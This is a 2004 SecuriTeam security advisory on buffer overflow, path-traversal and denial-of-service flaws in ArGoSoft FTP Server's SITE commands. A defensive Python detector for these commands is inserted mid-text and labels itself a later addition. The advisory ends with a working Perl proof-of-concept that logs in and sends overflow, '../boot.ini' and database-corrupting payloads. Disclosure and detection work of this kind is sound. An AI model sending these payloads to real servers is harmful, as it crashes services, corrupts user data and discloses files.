[NT] ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/02/04
To: list@securiteam.com Date: 2 Mar 2004 18:23:44 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)
------------------------------------------------------------------------
SUMMARY
STORM has discovered multiple security vulnerabilities in
<http://www.argosoft.com/applications/ftpserver/> ArGoSoft's FTP Server:
1) Three allow overflowing an internal buffer - Buffer Overflows
2) One allows discovering whether a file exists on the server, including
files that reside outside the bound FTP root directory - File Disclosure
3) Another allows causing a DoS by overwriting critical parts of the user
database file (through the password change mechanism) in such a way that
the user database is no longer usable - Denial of Service
DETAILS
Vulnerable Systems:
* ArGoSoft version 1.4.1.4 and prior
* ArGoSoft version 1.4.1.5
Immune Systems:
* ArGoSoft version 1.4.1.6
Buffer Overflows:
The first two vulnerabilities revolve around the use of the SITE ZIP
command: its parameters are not checked for their length, so an over-long
parameter overflows the internal buffer used by the command. The first one
can be triggered by sending "SITE ZIP Ax512" (Ax512 = the "A" character
written 512 times), the second by sending "SITE ZIP storm.zip /f:Ax2048".
The third buffer overflow is in the "SITE COPY" command; to recreate it,
send "SITE COPY Ax2048 Ax10".
File Disclosure:
The file disclosure vulnerability is caused by the "SITE UNZIP" command.
The parameter given to SITE UNZIP is the file it should unzip, and since a
"../" in that parameter is not filtered, the existence of files that reside
outside the FTP root directory can be verified by comparing the server's
response for "../boot.ini" (a file known to exist on an NT system drive)
against its response for a name that does not exist, such as
"../notthere.ini".
Denial of Service:
The denial of service vulnerability is caused by the "SITE PASS" command.
This command receives as its second parameter the new password to use; if
that password is very long, the user database becomes corrupt and unusable.
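The four SITE-command abuses described above can be spotted on the control channel before the server ever processes them. The following is an added example, not part of the advisory or of ArGoSoft's software: a small classifier that walks a captured FTP command stream and flags a SITE ZIP / COPY argument of the lengths the proof-of-concept uses, a "../" in a SITE UNZIP argument, or an over-long new password in SITE PASS. The thresholds are taken from the advisory's PoC inputs (512, 2048 and 3500 bytes); the server's real buffer sizes are not published, so treating these as alert thresholds is an assumption. The session lines are constructed for the example.

```python
"""Flag ArGoSoft-style SITE command abuse in an FTP control-channel capture.

Added example (not from the advisory).  Thresholds are the advisory's PoC
lengths, not the server's real buffer sizes (assumption).
"""

import re
from typing import List, Optional, Tuple

# Lengths at which the advisory's proof-of-concept inputs trigger the bugs.
SITE_ZIP_NAME_LEN = 512    # SITE ZIP Ax512
SITE_ZIP_FSPEC_LEN = 2048  # SITE ZIP storm.zip /f:Ax2048
SITE_COPY_SRC_LEN = 2048   # SITE COPY Ax2048 Ax10
SITE_PASS_NEW_LEN = 3500   # SITE PASS storm Ax3500

# A ".." path component delimited by "/" or "\" (or the string boundary).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def check_command(line: str) -> Optional[str]:
    """Return a finding for one FTP command line, or None if it looks benign."""
    line = line.rstrip("\r\n")
    verb, _, rest = line.partition(" ")
    if verb.upper() != "SITE" or not rest:
        return None
    sub, _, argstr = rest.partition(" ")
    sub = sub.upper()
    args = argstr.split()

    if sub == "ZIP":
        # SITE ZIP <archive> [/f:<file spec>]
        if args and len(args[0]) >= SITE_ZIP_NAME_LEN:
            return f"SITE ZIP: archive name of {len(args[0])} bytes (overflow)"
        for a in args[1:]:
            if a.lower().startswith("/f:") and len(a) - 3 >= SITE_ZIP_FSPEC_LEN:
                return f"SITE ZIP: /f: spec of {len(a) - 3} bytes (overflow)"
    elif sub == "COPY":
        # SITE COPY <source> <destination>
        if args and len(args[0]) >= SITE_COPY_SRC_LEN:
            return f"SITE COPY: source of {len(args[0])} bytes (overflow)"
    elif sub == "UNZIP":
        # The archive name is used unfiltered, so ".." escapes the FTP root.
        if TRAVERSAL.search(argstr):
            return f"SITE UNZIP: traversal in {argstr!r} (file-existence probe)"
    elif sub == "PASS":
        # SITE PASS <old> <new>; an over-long <new> corrupts the user database.
        if len(args) >= 2 and len(args[1]) >= SITE_PASS_NEW_LEN:
            return f"SITE PASS: new password of {len(args[1])} bytes (DoS)"
    return None


def scan_session(lines: List[str]) -> List[Tuple[int, str]]:
    """Run check_command over a session; return (line index, finding) pairs."""
    findings = []
    for idx, line in enumerate(lines):
        hit = check_command(line)
        if hit:
            findings.append((idx, hit))
    return findings


# Constructed sample session: benign traffic interleaved with the PoC inputs.
SAMPLE_SESSION = [
    "USER storm",
    "PASS secret",
    "SITE ZIP backup.zip /f:*.txt",          # benign
    "SITE ZIP " + "A" * 512,                  # overflow #1
    "SITE UNZIP ../boot.ini",                 # traversal probe
    "SITE UNZIP archive.zip",                 # benign
    "SITE COPY " + "A" * 2048 + " " + "A" * 10,   # overflow #3
    "SITE PASS storm " + "A" * 3500,          # user-database DoS
    "QUIT",
]

if __name__ == "__main__":
    for idx, finding in scan_session(SAMPLE_SESSION):
        print(f"line {idx}: {finding}")
```

Feeding the sample session through scan_session reports lines 3, 4, 6 and 7 and leaves the benign SITE ZIP and SITE UNZIP lines alone. The traversal regex deliberately requires ".." to be a whole path component, so an archive called "old..zip" is not flagged.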
Solution:
Upgrade to the latest version of ArGoSoft FTP Server.
Vendor response:
The vendor was very responsive and quick to fix the issues (within the
first 48 hours); the newest version should fix the above vulnerabilities.
The new version is available from the vendor's web site.
Exploit (for all the vulnerabilities):
#!/usr/bin/perl
# Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
# Created by Beyond Security Ltd. - All rights reserved.
use strict;
use warnings;
use IO::Socket;

my $host = "192.168.1.243";   # target running ArGoSoft FTP Server
my $port = 2119;              # control port the target listens on

my $remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
unless ($remote) { die "cannot connect to ftp daemon on $host:$port" }
print "connected\n";
$remote->autoflush(1);

# Read the greeting until the final 220 banner line.
while (<$remote>)
{
    print $_;
    last if (/220 /);
}

# Log in; a valid account is needed since SITE commands are only
# accepted after authentication.
my $ftp = "USER username\r\n";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
    print $_;
    last if (/331 /);
}

$ftp = join("", "PASS ", "password", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
    print $_;
    last if (/230 /);
}

# Choose one of the following to test the vulnerabilities mentioned
# (uncomment exactly one; with all of them commented out the script
# simply resends the PASS command).
#$ftp = join("", "SITE ZIP ", "A"x512, "\r\n");                  # buffer overflow
#$ftp = join("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n");    # buffer overflow
#$ftp = join("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n");   # buffer overflow
#$ftp = join("", "SITE UNZIP ", "../boot.ini\r\n");               # directory traversal (we know a certain file exists)
#$ftp = join("", "SITE PASS ", "storm ", "A"x3500, "\r\n");      # DoS against the user database
print $remote $ftp;
print $ftp;
sleep(1);
# Wait for the completion reply; if the server crashed, the socket
# closes and the loop ends on EOF instead.
while (<$remote>)
{
    print $_;
    last if (/250 Done/);
}
close $remote;
ADDITIONAL INFORMATION
SecuriTeam would like to thank <mailto:storm@securiteam.com> STORM for
finding these vulnerabilities.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.